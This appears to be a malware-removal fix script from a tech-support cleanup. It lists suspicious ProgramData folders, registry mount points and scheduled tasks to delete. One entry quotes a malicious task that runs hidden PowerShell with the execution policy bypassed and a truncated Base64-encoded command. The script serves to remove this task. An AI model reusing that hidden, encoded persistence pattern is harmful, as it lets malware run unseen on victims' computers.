CreateRestorePoint:
HKU\S-1-5-21-1623267419-245216016-1705312417-1000\...\MountPoints2: {f5a2ea49-a4ec-11e5-8132-806e6f6e6963} - D:\setup.exe
2016-03-04 05:55 - 2016-03-04 05:55 - 00000000 ____D C:\ProgramData\39e932de-0f77-0
2016-03-04 05:50 - 2016-03-04 05:50 - 00003728 _____ C:\Windows\System32\Tasks\{27C9BB3F-9EF5-DD10-DE32-E939F5382C12}
2016-03-04 05:50 - 2016-03-04 05:50 - 00000000 ____D C:\ProgramData\ad788e1c
2016-03-04 05:50 - 2016-03-04 05:50 - 00000000 ____D C:\ProgramData\39e932de-76f3-0
2016-03-04 05:47 - 2016-03-04 05:47 - 00000000 ____D C:\ProgramData\{14552373-512c-1}
2016-03-04 05:47 - 2016-03-04 05:47 - 00000000 ____D C:\ProgramData\{06fb436f-312c-0}
2016-03-04 16:14 - 2016-01-18 19:09 - 00000000 ____D C:\ProgramData\fa4b496a-2753-1
2016-03-04 05:50 - 2016-01-18 19:09 - 00000000 ____D C:\ProgramData\fa4b496a-6c81-0
Task: {C1457CF8-E2E3-4D1C-9EBA-67366A10D637} - System32\Tasks\{047D0D47-7F0E-7D0F-7E11-040A0B08110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9440 more characters).
EmptyTemp: